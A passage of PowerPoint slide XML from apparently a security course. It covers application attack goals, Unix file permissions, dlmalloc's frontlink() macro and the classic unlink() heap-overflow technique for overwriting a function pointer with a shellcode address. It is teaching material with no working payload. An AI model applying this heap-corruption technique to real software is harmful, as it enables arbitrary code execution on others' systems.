          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remotely (e.g., remote file transfer, remote session)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The behavior of an application is determined by the code being executed, the data being processed, and the environment in which the application is run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks against applications aim at bringing applications to execute operations that violate the security of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violation of integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violation of confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violation of availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347765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0254-364E-ACEB-36EF-DDE5F9220E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC991E86-CD19-FD96-9932-2A5ABC07988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-al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r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</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rwsr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xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x 1 root root 215944 Apr  3 11:00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r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</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-l /</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lrwxrwxrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   1 root root          7 Apr 20  2022 bin -&gt;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drwxrwxrwt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  20 root root      20480 Sep 30 11:44 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</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drwxr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xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x  11 root root       4096 Apr 20  2022 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</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–l /dev</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crw</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rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>----  1 root  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dialout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   4,  64 Sep 16 06:13 ttyS0</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405521164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9844" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>List Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059845" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is responsible for inserting entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is used to insert entry P with its pointers FD and BK into bin IDX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183950772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9844" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059845" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, P, S, IDX, BK, FD) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  IDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bin_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(S); // Finds the index of a bin given the chunk size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  BK = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bin_at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, IDX); // Extract head pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  FD = BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (FD == BK) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mark_binblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, IDX); // Mark bin as not empty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  else{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    while (FD != BK &amp;&amp; S &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>chunksize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(FD) ){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      FD = FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</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BK = FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = P; 		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35870791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6" name="Rectangle 8"/>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61897" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A heap overflow modifies in-memory management tags to trick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into overwriting addresses chosen by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite an arbitrary memory position with arbitrary integer: the address stored in FD + 12 (offset of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is overwritten with BK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>BK = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>FD = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; // *(P-&gt;fd+12) = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; // *(P-&gt;bk+8) = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite a function pointer with the address of the shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When function is later invoked, the shellcode is executed instead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36544661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4419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable program allocates two adjacent memory chunks, named X and Y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunk X is overflowed, two fake (free) chunks are created over Y, called W (free) and Z (allocated)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When X is freed, it will be merged with W  and the unlink() macro will be called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since W and Z are under the attacker’s control, arbitrary values can be specified </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29993163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5444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20574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45" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20574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5446" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20574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47" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20574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48" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20574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5452" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2914650"/>
            <a:ext cx="2362200" cy="19431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54" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048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5460" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3543300"/>
            <a:ext cx="743037"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Y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085461" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
